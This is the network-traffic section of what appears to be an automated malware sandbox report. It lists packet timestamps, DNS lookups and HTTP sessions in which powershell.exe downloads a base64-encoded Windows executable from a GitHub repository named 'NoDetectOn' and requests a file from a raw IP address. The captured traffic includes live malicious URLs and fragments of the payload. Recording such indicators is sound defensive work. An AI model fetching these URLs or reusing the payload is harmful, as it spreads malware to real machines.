                        Oct 2, 2024 05:23:19.381500006 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.381525993 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.381659031 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.381674051 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.381804943 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.381824017 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.381843090 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.381894112 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.381901026 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.381923914 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.381952047 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.383758068 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.383784056 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.383857965 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.383863926 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.383954048 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.384102106 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.384119987 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.384172916 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.384186029 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.384231091 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.384557962 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.384573936 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.384650946 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.384656906 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.384766102 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.385051012 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385068893 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385142088 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.385148048 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385236979 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.385397911 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385416985 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385457993 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.385471106 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385525942 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.385525942 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.385678053 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385693073 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385786057 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.385803938 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.385952950 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.475974083 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476003885 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476115942 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.476129055 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476192951 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.476267099 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476290941 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476361990 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.476366043 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.476423025 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.476423025 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478236914 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478266954 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478339911 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478339911 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478344917 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478396893 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478570938 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478590965 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478663921 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478667974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478749037 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478749037 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478844881 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478863955 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.478944063 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.478949070 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479007006 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479233980 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479253054 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479314089 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479317904 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479372978 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479599953 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479619980 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479756117 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.479759932 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.479835987 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.480036974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.480056047 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.480129004 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.480133057 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.480149984 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.480215073 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.570595026 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.570621014 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.570947886 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.570985079 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.571058989 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.571058989 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.571058989 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.571078062 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.572807074 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.572830915 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573024988 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573024988 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573031902 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573237896 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573261023 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573528051 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573533058 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573575974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573594093 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.573702097 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573702097 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.573707104 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574119091 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574156046 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574230909 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574230909 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574237108 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574429035 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574445963 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574541092 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574541092 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574546099 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574695110 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574728012 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.574786901 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574786901 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.574791908 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.624002934 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.665009975 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665035963 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665334940 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665369034 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665416956 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.665416956 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.665431976 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.665973902 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.667783022 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.667798996 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.667882919 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.667890072 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668220997 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668240070 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668348074 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.668353081 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668390036 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.668973923 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.668988943 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669056892 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669061899 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669457912 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669476032 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669553995 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669553995 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669559956 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669576883 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669718981 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669733047 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669811010 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.669816017 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.669998884 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.670017004 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.670100927 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.670106888 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.717924118 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.759531021 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759563923 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759833097 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.759845972 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759876966 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759896994 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759912014 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.759917974 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.759968042 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.760005951 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.761723995 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.761744022 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.761821032 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.761830091 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.761909962 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762013912 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762031078 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762089968 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762094975 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762161970 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762161970 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762352943 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762372017 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762484074 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762492895 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762552023 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762566090 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762578964 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762641907 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762641907 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.762651920 CEST44349710185.199.111.133192.168.2.12
                        Oct 2, 2024 05:23:19.762726068 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.765737057 CEST49710443192.168.2.12185.199.111.133
                        Oct 2, 2024 05:23:19.840462923 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:19.845297098 CEST8049711107.172.130.147192.168.2.12
                        Oct 2, 2024 05:23:19.845396996 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:19.845839024 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:19.851691008 CEST8049711107.172.130.147192.168.2.12
                        Oct 2, 2024 05:23:20.337328911 CEST8049711107.172.130.147192.168.2.12
                        Oct 2, 2024 05:23:20.389466047 CEST4971180192.168.2.12107.172.130.147
                        Oct 2, 2024 05:23:20.506352901 CEST4971180192.168.2.12107.172.130.147

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 2, 2024 05:23:16.842870951 CEST6369153192.168.2.121.1.1.1
                        Oct 2, 2024 05:23:16.849626064 CEST53636911.1.1.1192.168.2.12

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 2, 2024 05:23:16.842870951 CEST192.168.2.121.1.1.10xa1bfStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 2, 2024 05:23:16.849626064 CEST1.1.1.1192.168.2.120xa1bfNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                        Oct 2, 2024 05:23:16.849626064 CEST1.1.1.1192.168.2.120xa1bfNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                        Oct 2, 2024 05:23:16.849626064 CEST1.1.1.1192.168.2.120xa1bfNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                        Oct 2, 2024 05:23:16.849626064 CEST1.1.1.1192.168.2.120xa1bfNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • raw.githubusercontent.com
                        • 107.172.130.147

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.1249711107.172.130.147805048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 2, 2024 05:23:19.845839024 CEST78OUTGET /500/RSSTT.txt HTTP/1.1
                        Host: 107.172.130.147
                        Connection: Keep-Alive
                        Oct 2, 2024 05:23:20.337328911 CEST542INHTTP/1.1 404 Not Found
                        Date: Wed, 02 Oct 2024 03:23:20 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                        Content-Length: 301
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=iso-8859-1
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 32 2e 31 33 30 2e 31 34 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 107.172.130.147 Port 80</address></body></html>


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.1249710185.199.111.1334435048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-10-02 03:23:17 UTC128OUTGET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        2024-10-02 03:23:17 UTC904INHTTP/1.1 200 OK
                        Connection: close
                        Content-Length: 2935468
                        Cache-Control: max-age=300
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Content-Type: text/plain; charset=utf-8
                        ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        X-GitHub-Request-Id: 9D15:3A4BF6:1706DDC:18C7EAB:66FCBC5F
                        Accept-Ranges: bytes
                        Date: Wed, 02 Oct 2024 03:23:17 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-ewr-kewr1740020-EWR
                        X-Cache: HIT
                        X-Cache-Hits: 0
                        X-Timer: S1727839397.433730,VS0,VE2
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: 560b052874acdd7483dfda1b724b84bbf41196b2
                        Expires: Wed, 02 Oct 2024 03:28:17 GMT
                        Source-Age: 70
                        2024-10-02 03:23:17 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                        2024-10-02 03:23:17 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                        Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                        2024-10-02 03:23:17 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                        Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                        2024-10-02 03:23:17 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                        Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
